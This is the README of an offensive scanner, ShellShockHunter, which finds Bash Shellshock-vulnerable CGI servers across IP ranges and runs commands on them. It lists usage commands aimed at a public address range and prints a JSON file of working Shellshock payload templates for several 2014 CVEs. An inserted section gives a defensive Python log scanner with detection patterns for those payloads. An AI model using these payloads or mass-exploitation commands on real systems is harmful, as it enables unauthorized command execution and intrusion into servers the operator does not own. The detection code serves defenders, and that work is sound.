ShellShockHunter Tool v1.0

Author:   MrCl0wn
Blog:     http://blog.mrcl0wn.com
GitHub:   https://github.com/MrCl0wnLab
Twitter:  https://twitter.com/MrCl0wnLab
Shellshock (software bug)

Shellshock, also known as Bashdoor, is a family of security bugs in the Unix
Bash shell, the first of which was disclosed on 24 September 2014. Shellshock
could enable an attacker to cause Bash to execute arbitrary commands and
gain unauthorized access to many Internet-facing services, such as web servers,
that use Bash to process requests.

DISCLAIMER

This or previous programs are for educational purposes ONLY. Do not use
them without permission. The usual disclaimer applies, especially the fact
that I (MrCl0wnLab) am not liable for any
damages caused by direct or indirect use of the information or
functionality provided by these programs. The author or any Internet
provider bears NO responsibility for content or misuse of these programs
or any derivatives thereof. By using these programs you accept the fact
that any damage (data loss, system crash, system compromise, etc.)
caused by the use of these programs is not MrCl0wnLab's responsibility.

GIT CLONE

git clone https://github.com/MrCl0wnLab/ShellShockHunter

INSTALLATION (pip)

pip install shodan
pip install ipinfo

HELP
By: MrCl0wn / https://blog.mrcl0wn.com

usage: tool [-h] [--file <ips.txt>] [--range <ip-start>,<ip-end>] [--cmd-cgi <command shell>] [--exec-vuln <command shell>] [--thread <10>] [--check] [--ssl] [--cgi-file <cgi.txt>] [--timeout <5>] [--all] [--debug]

optional arguments:
  -h, --help            show this help message and exit
  --file <ips.txt>      File targets
  --range <ip-start>,<ip-end>
                        Range IP Ex: 192.168.15.1,192.168.15.100
  --cmd-cgi <command shell>
                        Command: uname -a
  --exec-vuln <command shell>
                        Executing commands on vulnerable targets
  --thread <10>, -t <10>
                        Eg. 20
  --check               Checker vuln
  --ssl                 Set protocol https
  --cgi-file <cgi.txt>
                        Set file cgi
  --timeout <5>         Set timeout conection
  --all                 Teste all payloads
  --debug               Set debugs

COMMAND e.g:
python main.py --range '194.206.187.X,194.206.187.XXX' --check --thread 40 --ssl

python main.py --range '194.206.187.X,194.206.187.XXX' --check --thread 10 --ssl --cgi-file 'wordlist/cgi.txt'

python main.py --range '194.206.187.X,194.206.187.XXX' --cmd 'id;uname -a' --thread 10 --ssl --cgi-file 'wordlist/cgi.txt'

python main.py --file targets.txt --cmd 'id;uname -a' --thread 10 --ssl --cgi-file 'wordlist/cgi.txt'

python main.py --file targets.txt --cmd 'id;uname -a' --thread 10 --ssl --cgi-file 'wordlist/cgi.txt' --all

python main.py --range '194.206.187.X,194.206.187.XXX' --check --thread 40 --ssl --cgi-file 'wordlist/cgi2.txt' --exec-vuln 'curl -v -k -i "_TARGET_"'

python main.py --range '194.206.187.X,194.206.187.XXX' --check --thread 40 --ssl --cgi-file 'wordlist/cgi2.txt' --exec-vuln './exploit -t "_TARGET_"'
PRINTS

[Screenshots not reproduced: banner; PROCESS; SPECIAL COMMAND ( --exec-vuln 'echo "_TARGET_"' )]

SOURCE FILE ( Exploits )

pwd: assets/exploits.json

{
    "DEFAULT":
        "() { :; }; echo ; /bin/bash -c '_COMMAND_'",
    "CVE-2014-6271": 
        "() { :; }; echo _CHECKER_; /bin/bash -c '_COMMAND_'",
    "CVE-2014-6271-2":
        "() { :;}; echo '_CHECKER_' 'BASH_FUNC_x()=() { :;}; echo _CHECKER_' bash -c 'echo _COMMAND_'",
    "CVE-2014-6271-3":
        "() { :; }; echo ; /bin/bash -c '_COMMAND_';echo _CHECKER_;",
    "CVE-2014-7169":
        "() { (a)=>\' /bin/bash -c 'echo _CHECKER_'; cat echo",
    "CVE-2014-7186":
        "/bin/bash -c 'true <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF' || echo '_CHECKER_, redir_stack'",
    "CVE-2014-7187":
        "(for x in {1..200} ; do echo "for x$x in ; do :"; done; for x in {1..200} ; do echo done ; done) | /bin/bash || echo '_CHECKER_, word_lineno'",
    "CVE-2014-6278":
        "() { _; } >_[$($())] { echo _CHECKER_; id; } /bin/bash -c '_COMMAND_'",
    "CVE-2014-6278-2":    
        "shellshocker='() { echo _CHECKER_; }' bash -c shellshocker",
    "CVE-2014-6277":
        "() { x() { _; }; x() { _; } <<a; } /bin/bash -c _COMMAND_;echo _CHECKER_",
    "CVE-2014-*":
        "() { }; echo _CHECKER_' /bin/bash -c '_COMMAND_'"
}
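
Most of the templates above share the "() {" function-definition prefix, and the CVE-2014-7186 one is a long run of here-documents, which makes them easy to find in web server logs. The following is an added example for defenders, not part of ShellShockHunter: a Python scanner over combined-format access logs, in which the signature names, regular expressions and sample lines are constructed for illustration.

```python
import re

# One double-quoted log field; Apache writes embedded quotes as \".
QUOTED = r'"((?:[^"\\]|\\.)*)"'
# Combined log format: ip, identity, user, [time], "request", status, size,
# "referer", "user-agent".
LOG_RE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] ' + QUOTED + r' (\d{3}) \S+ ' + QUOTED + ' ' + QUOTED
)

SIGNATURES = {
    # "() {" with optional whitespace: the function-definition prefix that
    # unpatched Bash parsed out of environment variables.
    "func_def": re.compile(r"\(\s*\)\s*\{"),
    # A long run of here-documents, the shape of the CVE-2014-7186 template.
    "heredoc_stack": re.compile(r"(?:<<\s*EOF\s*){5,}"),
}

def scan_line(line):
    """Return (client_ip, status, [(field, signature), ...]), or None if unparsable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, request, status, referer, agent = m.groups()
    fields = {"request": request, "referer": referer, "user_agent": agent}
    hits = [(name, sig) for name, value in fields.items()
            for sig, rx in SIGNATURES.items() if rx.search(value)]
    return ip, int(status), hits

def scan(lines):
    """Return the parsed entries that carry at least one signature hit."""
    parsed = (scan_line(line) for line in lines)
    return [p for p in parsed if p and p[2]]

# Constructed sample lines: documentation IP ranges, with the _CHECKER_ and
# _COMMAND_ placeholders left unexpanded. None of this is real traffic.
SAMPLE = r'''
198.51.100.7 - - [01/Oct/2014:10:00:00 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"
203.0.113.9 - - [01/Oct/2014:10:00:01 +0000] "GET /cgi-bin/status HTTP/1.1" 200 64 "-" "() { :; }; echo _CHECKER_; /bin/bash -c '_COMMAND_'"
203.0.113.9 - - [01/Oct/2014:10:00:02 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 500 0 "() { :;}; echo _CHECKER_" "curl/7.38.0"
192.0.2.44 - - [01/Oct/2014:10:00:03 +0000] "GET /cgi-bin/status HTTP/1.1" 200 64 "-" "/bin/bash -c 'true <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF' || echo \"_CHECKER_\""
'''.strip().splitlines()

if __name__ == "__main__":
    for ip, status, hits in scan(SAMPLE):
        print(ip, status, hits)
```

Combined-format logs record only the request line, Referer and User-Agent, so a pattern carried in another header such as Cookie needs a log format that captures it. A hit shows that a request carried the pattern, not that the host's Bash was unpatched.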

SOURCE FILE ( Config )

pwd: assets/config.json



{
    "config": {
        "threads": 10,
        "path": {
            "path_output": "output/",
            "path_wordlist": "wordlist/",
            "path_modules": "modules/",
            "path_assets": "assets/"
        },
        "files_assets":{
            "config": "assets/config.json",
            "autor": "assets/autor.json",
            "exploits": "assets/exploits.json"
        },
        "api":{
            "shodan":"",
            "ipinfo":""
        }
    }
}
TREE
├── assets
│   ├── autor.json
│   ├── config.json
│   ├── exploits.json
│   └── prints
│       ├── banner.png
│       ├── print01.png
│       ├── print02.png
│       └── print03.png
├── main.py
├── modules
│   ├── banner_shock.py
│   ├── color_shock.py
│   ├── file_shock.py
│   ├── __init__.py
│   ├── request_shock.py
│   ├── shodan_shock.py
│   └── thread_shock.py
├── output
│   └── vuln.txt
├── README.md
└── wordlist
    └── cgi.txt
